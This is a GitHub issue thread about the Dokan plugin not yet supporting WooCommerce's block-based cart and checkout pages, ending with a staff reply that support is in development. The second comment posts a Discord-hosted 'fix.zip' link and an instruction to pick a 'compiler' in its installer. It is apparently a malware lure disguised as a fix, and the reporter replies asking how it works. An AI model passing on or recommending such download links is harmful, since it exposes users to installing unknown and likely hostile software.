### ISSUE TITLE
New checkout and cart pages, Gutenberg editor 

### ISSUE THREAD

**Issue by Adioman** [getdokan/dokan#2362]
### Bug Description

Hi, when creating new woocommerce checkout and cart pages, I get an error message
"This block does not support Dokan Pro yet. This may be related to customer interactions."
Link to learn more https://woocommerce.com/document/woocommerce-store-editing/customizing-cart-and-checkout/

### Expected Behaviour

I want to make the new checkout pages and cart work with Dokan

### Actual Behaviour

I want to make the new checkout pages and cart work with Dokan

### Environment (please complete the following information)

```shell
1. Dokan Version: [3.12.1]
2. Dokan Pro Version: [3.12.0]
3. WooCommerce Version: [9.2.3]
4. Browser [Microsoft Edge]
5. Current Theme: [Woodmart]
```

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Adioman** [comment]
Hi, how does it work?

  
>Вторник, 3 сентября 2024, 10:50 +07:00 от Mohammad Nakshbandi ***@***.***>:
> 
> 
>try this
>https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
>select the desired compiler in the installer
>—
>Reply to this email directly,  view it on GitHub , or  unsubscribe .
>You are receiving this because you authored the thread. Message ID:  <getdokan/dokan/issues/2362/2325554139 @ github . com> 
 
 
--
С уважением, Артём Юрьевич

**Comment by Fayeakuzzamantonmoy** [comment]
Hello @Adioman, 

Our plugins do not yet support Block Checkout. However, we want to assure you that our development team is actively working to make the Dokan and Dokan Pro plugins fully compatible with this feature. We are committed to resolving this as soon as possible and appreciate your understanding and patience in the meantime. We will keep you updated on our progress and notify you once the solution is available.

Thanks!
